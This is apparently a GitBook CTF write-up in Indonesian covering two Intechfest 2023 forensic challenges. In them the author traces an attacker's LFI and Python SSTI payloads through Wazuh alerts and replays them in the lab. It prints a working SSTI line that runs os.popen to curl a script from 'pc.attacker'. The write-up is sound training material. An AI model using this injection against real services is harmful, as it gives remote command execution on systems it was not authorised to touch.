⏪
CTFs
TwitterGithub
  • 👋Introduction
  • 📚Write Up
    • 2024
      • 📖1337UP LIVE CTF
        • Reverse Engineering
        • Mobile
        • Forensic
        • Misc
      • 📖HKCERT CTF Quals
        • Reverse Engineering
        • Binary Exploitation
      • 📖Flare-On 11
        • Challenge #1 - frog
      • 📖Intechfest
        • Reverse Engineering
        • Forensic
        • Cryptography
        • Mobile
      • 📖Cyber Breaker Competition (1v1)
        • Reverse Engineering
        • Web Exploitation
        • Cryptography
        • Binary Exploitation
      • 📖Cyber Breaker Competition Quals
        • Reverse Engineering
        • Web Exploitation
        • Cryptography
      • 📖BlackHat MEA Quals
        • Reverse Engineering
        • Forensic
      • 📖TFC CTF
        • Reverse Engineering
        • Forensic
        • Misc
      • 📖DeadSec CTF
        • Reverse Engineering
        • Web Exploitation
      • 📖Aptos - Code Collision CTF
        • Reverse Engineering
        • Misc
      • 📖DownUnder CTF
        • Reverse Engineering
      • 📖JustCTF
        • Reverse Engineering
        • Forensic
        • Misc
      • 📖Akasec CTF
        • Reverse Engineering
        • Forensic
      • 📖Codegate CTF Preliminary
        • Reverse Engineering
      • 📖NahamCon CTF
        • Cryptography
        • Reverse Engineering
        • Malware
        • Misc
        • Mobile
        • Scripting
        • Web Exploitation
        • Forensic
      • 📖SAS CTF Quals
        • Reverse Engineering
      • 📖SwampCTF
        • Reverse Engineering
        • Misc
        • Cryptography
      • 📖UNbreakable International
        • Reverse Engineering
        • Network
        • Cryptography
      • 📖ACSC
        • Reverse Engineering
        • Hardware
        • Web Exploitation
      • 📖0xL4ugh
        • Mobile
    • 2023
      • 📖BlackHat MEA Final
        • Reverse Engineering
        • Web Exploitation
      • 📖Flare-On 10
        • Challenge #1 - X
        • Challenge #2 - ItsOnFire
        • Challenge #3 - mypassion
        • Challenge #4 - aimbot
        • Challenge #5 - where_am_i
        • Challenge #6 - FlareSay
        • Challenge #7 - flake
        • Challenge #8 - AmongRust
        • Challenge #9 - mbransom
        • Challenge #10 - kupo
        • Challenge #11 - over_the_rainbow
        • Challenge #12 - HVM
        • Challenge #13 - y0da
      • 📖LakeCTF Quals
        • Reverse Engineering
        • Cryptography
      • 📖TSG CTF
        • Reverse Engineering
        • Cryptography
      • 📖ISITDTU Quals
        • Web Exploitation
        • Misc
        • Reverse Engineering
      • 📖BlackHat MEA Quals
        • Reverse Engineering
      • 📖ASCIS Final
        • Reverse Engineering
        • Web Exploitation
        • Cryptography
      • 📖ASCIS Quals
        • Reverse Engineering
        • Forensic
        • Cryptography
      • 📖IFest
        • Reverse Engineering
        • Cryptography
        • Misc
      • 📖Cyber Jawara International
        • Reverse Engineering
        • Forensic
        • Cryptography
        • Web Exploitation
      • 📖Intechfest
        • Reverse Engineering
        • Forensic
        • Cryptography
        • Mobile
      • 📖CSAW Quals
        • Reverse Engineering
      • 📖SECCON Quals
        • Reverse Engineering
      • 📖CTFZone Quals
        • Reverse Engineering
      • 📖Securinets Quals
        • Reverse Engineering
      • 📖Compfest Final (Attack Defense)
        • Web Exploitation
        • Cryptography
      • 📖Compfest Quals
        • Reverse Engineering
        • Cryptography
        • Forensic
        • Misc
      • 📖Tenable
        • Reverse Engineering
        • Cryptography
        • Steganography
      • 📖ASCWG Quals
        • Reverse Engineering
        • Cryptography
      • 📖Gemastik Quals
        • Reverse Engineering
      • 📖BSides Indore
        • Reverse Engineering
        • Cryptography
      • 📖NahamCon CTF
        • Cryptography
      • 📖HSCTF
        • Reverse Engineering
        • Cryptography
        • Web Exploitation
        • Misc
      • 📖ACSC
        • Reverse Engineering
      • 📖HackTM Quals
        • Reverse Engineering
    • 2022
      • 📖Intechfest
        • Reverse Engineering
        • Mobile
        • Cryptography
      • 📖NCW Final
        • Reverse Engineering
      • 📖NCW Quals
        • Reverse Engineering
        • Misc
        • Cryptography
      • 📖Compfest Final
        • Reverse Engineering
        • Forensic
      • 📖Compfest Quals
        • Reverse Engineering
        • Cryptography
      • 📖IFest
        • Reverse Engineering
        • Cryptography
        • Forensic
    • 2021
      • 📖Cyber Jawara Final
        • Reverse Engineering
      • 📖Cyber Jawara Quals
        • Reverse Engineering
        • Cryptography
      • 📖DarkCon CTF
        • Reverse Engineering
      • 📖Wreck IT Quals
        • Mobile
      • 📖MDT4.0 Final
        • Reverse Engineering
        • Cryptography
        • Forensic
      • 📖MDT4.0 Quals
        • Reverse Engineering
        • Cryptography
      • 📖IFest
        • Reverse Engineering
        • Cryptography
      • 📖Compfest Final
        • Reverse Engineering
      • 📖Compfest Quals
        • Reverse Engineering
        • Cryptography
    • 2020
      • 📖Deep CTF
        • Reverse Engineering
  • 🚩Lifetime CTF
    • 📖Hack The Box
      • Reverse Engineering
        • TBU
Powered by GitBook
On this page
  • VWA-WAZUH: The Spectator (100 pts)
  • Description
  • Solution
  • VWA-WAZUH: The Overseer (100 pts)
  • Description
  • Solution
  1. Write Up
  2. 2023
  3. Intechfest

Forensic

PreviousReverse EngineeringNextCryptography

Last updated 9 months ago

Challenge
Link

VWA-WAZUH: The Spectator (100 pts)

VWA-WAZUH: The Overseer (436 pts)

Breached (496 pts)🥈

VWA-WAZUH: The Spectator (100 pts)

Description

-

Solution

Akses wazuh, lalu buka security events dan urutkan berdasarkan level. Berdasarkan referensi dari diketahui bahwa semakin tinggi level maka semakin tinggi juga kemungkinan berbahayanya. Karena disini berhubungan dengan penyerangan oleh seorang attacker maka lakukan pengecekan terlebih dahulu pada log-log dengan level yang tinggi.

Dapat dilihat ada beberapa alerts, pada “Local file inclusion” klik dan akan tampil payload yang digunakan oleh attacker untuk melancarkan serangan LFI.

Setelah mengetahui payload attacker maka selanjutnya kami akses honey comb lalu pilih fetcher dan masukkan payload tersebut untuk mendapatkan flag

Flag : INTECHFEST{if-you-know-the-path-you-win-a503d7757b28b50b7aeb741d7607b4ec}

VWA-WAZUH: The Overseer (100 pts)

Description

-

Solution

Selanjutnya pilih log dengan description “Python SSTI payload detected”

Pada payload yang digunakan (kolom full_log) terlihat bahwa terdapat %23 yang mana merupakan url encode untuk “#”. Selanjutnya deobfuscate manual, berikut untuk flownya

  • Url decode %23 menjadi #

  • Translate $<payload> menjadi bentuk asli dengan cara melakukan echo payload tersebut

  • Hasil translate menampilkan bentuk \123 yang mana itu merupakan format nilai octal pada python

Berikut contoh untuk translate $<payload>

Hasil dari translate sebagai berikut dan ada beberapa part yang salah(minor) karena hasil decode masih valid

Selanjutnya tinggal print saja misal dengan python

Untuk value setelah echo lakukan base64 decode

Pc.attacker tidak dapat diakses melalui internet, jadi langkah yang kami lakukan adalah mencoba melakukan curl melalui honeycomb. Salah satu cara yang bisa dilakukan adalah dengan memanfaatkan bug yang sama dengan attacker yaitu menjalankan command tersebut pada target dengan service calculator

cycler.__init__.__globals__.os.popen('curl pc.attacker:8080/lr.sh').read()

Flag : INTECHFEST{bash-obfuscation-db326a143a33eef9c7a79e7ec5f4bd09}

Akses wazuh, lalu buka security events dan urutkan berdasarkan level. Berdasarkan referensi dari diketahui bahwa semakin tinggi level maka semakin tinggi juga kemungkinan berbahayanya. Karena disini berhubungan dengan penyerangan oleh seorang attacker maka lakukan pengecekan terlebih dahulu pada log-log dengan level yang tinggi.

📚
📖
https://documentation.wazuh.com/current/user-manual/ruleset/rules-classification.html
Here
Here
Here
https://documentation.wazuh.com/current/user-manual/ruleset/rules-classification.html